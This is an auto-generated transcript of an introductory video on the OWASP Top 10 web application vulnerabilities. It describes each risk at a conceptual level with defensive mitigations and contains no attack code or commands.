foreign [Music] the top 10 web application vulnerabilities this is a useful topic for both web app and testers and Bug bounty hunters oasp stands for open web application security project it is an international organization dedicated to improving the security of software applications ovas provides tools and resources for engineers to help make applications more secure one of ovasp's most important contributions is the ovasp top 10 vulnerabilities list top 10 lists the 10 most critical web application security risks it is widely recognized as a standard for web application security by learning the ovas top 10 security risks organizations can reduce the risk of attacks against server Publications let's look at each of them in detail injection is a type of vulnerability in which an attacker injects malicious code into a web app injection can lead to unauthorized access to sensitive data loss of data or even complete system compromise an example of an injection attack is SQL injection this is where an attacker injects malicious SQL code into web applications SQL query this is usually done when inputs into the web app is not properly checked if successful the malicious score is executed by the database server another example is command injection here an attacker injects malicious Shell Code into web application this can lead to devastating consequences including a complete system takeover to prevent injection attacks it is important to check and sanitize all user input use ready-made SQL queries in the back end instead of generating SQL queries on the Fly additionally keep all software and libraries up to date with the latest security patches insufficient monitoring and logging refers to the lack of proper monitoring and logging this can make it difficult to detect and respond to security incidents for example if a system does not have proper locking in place it'll be difficult to detect when an attacker tries to compromise a web application additionally if the system does not have real-time monitoring it'll be difficult to detect security incidents on time to address insufficient monitoring and logging you should Implement a robust monitoring systems that capture a wide range of events this can include logging access to sensitive Data Network traffic and system logs as well as monitored network devices and systems for science of suspicious activity Additionally you should review and analyze log data to identify Trends and potential security incidents broken authentication refers to weaknesses in the authentication process of web application this includes issues such as weak or easily guessable passwords lack of proper password management and using vulnerable authentication mechanisms for example an attacker can explore A system that allows weak passwords by guessing common passwords they can also use brute force tools like Hydra and other password tracking tools another example is the use of easily disabled security questions such as what is your mother's maiden name this can be easily answered by an attacker who has done their basic research on the target to prevent broken authentication enable strong authentication mechanisms such as multi-factor Authentication also inverse password recycling policies that require users to change passwords periodically sensitive data exposure refers to the practice of storing and transmitive sensitive information this includes passwords credit card numbers and personal identification numbers without productive methods such as encryption this can result in the data being intercepted stolen or even manipulated by malicious stackers to mitigate this risk you should always encrypt sensitive information when stored and transmitted this includes storing encrypted passwords instead of plain text passwords appropriate Access Control should be put in place to ensure only authorized Personnel have access to sensitive data XML external entities is a security vulnerability that affects XML processes when they pass XML input this vulnerability allows an attacker to inject malicious XML code into an XML document this can lead to exposure of sensitive information denial loss service and even remote code execution to prevent excessive attacks applications should validate and sanitize XML input you should also disable external entity and DTD processing by default additionally use a less complex data format such as Json whenever possible while authentication tells us whether a user can access a system Access Control tells us who can access a specific resource in the system broken access control is a security vulnerability that occurs when an application does not restrict access to sensitive resources this includes files database records or even functionality that should be limited to select users broken Access Control can lead to unauthorized users being able to view modify or delete sensitive data to reduce this risk Implement Access Control policies and authentication mechanisms you can also assign access rights based on the principle of least privilege meaning that users should only have the minimum access required to perform their job regular security Audits and assessment will help identify and address any potential Access Control vulnerabilities security misconfiguration is a security vulnerability that arises when an application is not configured properly this can result in exposure of sensitive data such as error messages or system information for example if you don't change the default settings of your backend application it can expose the error messages to the user instead of gracefully handling it to reduce this risk we should configure systems according to industry-based practices we should also apply appropriate security controls and batches as needed additionally we should perform regular security scans and assessments to identify and address any misconfigurations cross-site scripting is a common security vulnerability this is done by injecting malicious scripts into a web page which is then executed by the victim's web browser for example consider a web page that allows users to post comments an attacker could draft a comment that contains malicious JavaScript code if the input is not sanitized this code will execute on every user who opens the comments page xss attacks can reveal sensitive information such as login credentials perform unauthorized actions on behalf of the victim or even redirect the victim to a malicious website to prevent excesses attacks always sanitize user generated content and validate input data on the server side DC realization is the process of converting a stream of bytes back into a data structure that will be used by a program insecure DC realization is a vulnerability that occurs when a web app DC analyzes untrusted data for example conserve a web application that allows users to upload a file containing serialized Java objects the web application then deserializes the objects and processes them an attacker can craft a malicious file which when deserialized will execute arbitrary code this can allow an attacker to perform various types of attacks such as remote code execution privileged escalation and data theft to prevent insecure desolization attacks it is important to validate all inputs additionally limit the amount of code that runs with high Privileges and ensure that all sensitive data is encrypted when you plan to use a piece of software always check for non-vulnerabilities there are many public databases like exploitdb which contains publicly disclosed vulnerabilities for various software and applications failing to do this can leave the system open to attacks as attackers can exploit these vulnerabilities to gain access to sensitive information for example an application may use a third-party library to handle file uploads but the library might have a non-vulnerability if the application uses the vulnerable Library it is open to attack even if the rest of the application is secure make sure you do your research before using any third-party software for your business to summarize ovast top 10 vulnerabilities is a vital checklist that we can use to keep our web applications and software secure as a pen tester or a bug Bounty Hunter you should be aware of these vulnerabilities to stay ahead of attackers always sanitize user input employ logging and do your research before using any third-party software hope you found this video useful if you have any questions please let me know in the comments see you soon with another topic